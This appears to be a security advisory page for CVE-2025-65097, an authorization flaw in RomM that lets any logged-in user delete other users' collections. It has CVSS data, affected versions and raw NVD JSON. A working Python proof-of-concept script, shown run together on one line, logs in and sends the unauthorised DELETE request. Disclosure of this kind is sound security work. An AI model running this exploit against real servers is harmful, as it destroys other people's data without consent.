Security Vulnerability Report
中文
CVE-2025-65097 CVSS 6.5 MEDIUM

CVE-2025-65097

Published: 2025-12-03 20:16:26
Last Modified: 2026-02-24 20:15:31

Description

RomM (ROM Manager) allows users to scan, enrich, browse and play their game collections with a clean and responsive interface. Prior to 4.4.1 and 4.4.1-beta.2, an Authenticated User can delete collections belonging to other users by directly sending a DELETE request to the collection endpoint. No ownership verification is performed before deleting collections. This vulnerability is fixed in 4.4.1 and 4.4.1-beta.2.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:romm.app:romm:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:romm.app:romm:4.4.1:beta1:*:*:*:*:*:* - VULNERABLE
RomM < 4.4.1
RomM < 4.4.1-beta.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-65097 PoC - RomM IDOR Collection Deletion # Target: RomM < 4.4.1 and < 4.4.1-beta.2 TARGET_URL = "http://target-romm-server.com" # Replace with target URL TARGET_COLLECTION_ID = 123 # Replace with target collection ID to delete # Step 1: Login to get authentication token login_url = f"{TARGET_URL}/api/auth/login" credentials = { "username": "attacker_username", "password": "attacker_password" } session = requests.Session() login_response = session.post(login_url, json=credentials) if login_response.status_code != 200: print(f"[-] Login failed: {login_response.status_code}") exit(1) print("[+] Login successful") # Step 2: Delete victim user's collection via IDOR delete_url = f"{TARGET_URL}/api/collections/{TARGET_COLLECTION_ID}" print(f"[*] Attempting to delete collection ID: {TARGET_COLLECTION_ID}") delete_response = session.delete(delete_url) if delete_response.status_code in [200, 204]: print(f"[+] SUCCESS: Collection {TARGET_COLLECTION_ID} deleted!") print("[*] The collection belonging to another user has been removed.") else: print(f"[-] Failed to delete collection: {delete_response.status_code}") print(f"[-] Response: {delete_response.text}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65097", "sourceIdentifier": "[email protected]", "published": "2025-12-03T20:16:26.283", "lastModified": "2026-02-24T20:15:31.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RomM (ROM Manager) allows users to scan, enrich, browse and play their game collections with a clean and responsive interface. Prior to 4.4.1 and 4.4.1-beta.2, an Authenticated User can delete collections belonging to other users by directly sending a DELETE request to the collection endpoint. No ownership verification is performed before deleting collections. This vulnerability is fixed in 4.4.1 and 4.4.1-beta.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:romm.app:romm:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.4.1", "matchCriteriaId": "3501BC54-F9F3-4C68-AD5E-142908B2948C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:romm.app:romm:4.4.1:beta1:*:*:*:*:*:*", "matchCriteriaId": "93D1318D-39AA-4BCF-BACF-A869B8444BAE"}]}]}], "references": [{"url": "https://github.com/rommapp/romm/security/advisories/GHSA-v7c8-f6xc-rv9g", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}